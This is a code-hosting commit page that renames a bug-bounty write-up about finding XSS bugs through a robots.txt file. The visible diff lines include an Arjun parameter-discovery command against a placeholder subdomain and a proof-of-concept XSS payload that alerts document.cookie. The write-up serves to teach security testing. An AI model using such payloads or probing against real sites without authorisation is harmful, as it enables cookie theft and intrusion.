crash.software
Projects
Pull Requests
Issues
Builds
NafisiAslH-KnowledgeSharing
Code
Files
Commits
Branches
Tags
Pull Requests
Code Comments
Code Compare
Issues
List
Boards
Milestones
Builds
Statistics
Contributions
Source Lines
Child Projects
Projects
STRLCPY
NafisiAslH-KnowledgeSharing
Commits
8e58b30c
🤬
Sign In
Update and rename 20230311 - How reading robots.txt file got me 4 XSS reports.md to 20230316 - How reading robots.txt file got me 4 XSS reports.md
Hossein NafisiAsl
committed with
GitHub
1 year ago
8e58b30c
1 parent
30dd4fc0
Total 1 files
■
■ ■ ■
■ ■
CyberSecurity/Web/BountyStory/XSS/20230311 - How reading robots.txt file got me 4 XSS reports.md
CyberSecurity/Web/BountyStory/XSS/20230316 - How reading robots.txt file got me 4 XSS reports.md
skipped 18 lines
19
19
### 8. Use Arjun to find hidden parameter
20
20
`arjun -u https://sub.domain.com/admin/colorpicker_IEPatch.asp`
21
21
22
-
### 9.
23
-
24
-
### 10. Payload:
22
+
### 9.
Payload
:
25
23
`</script><img src=x onerror=alert(document.cookie)>`
26
24
27
25
skipped 8 lines
All occurrences
Please wait...
Page is in error, reload to recover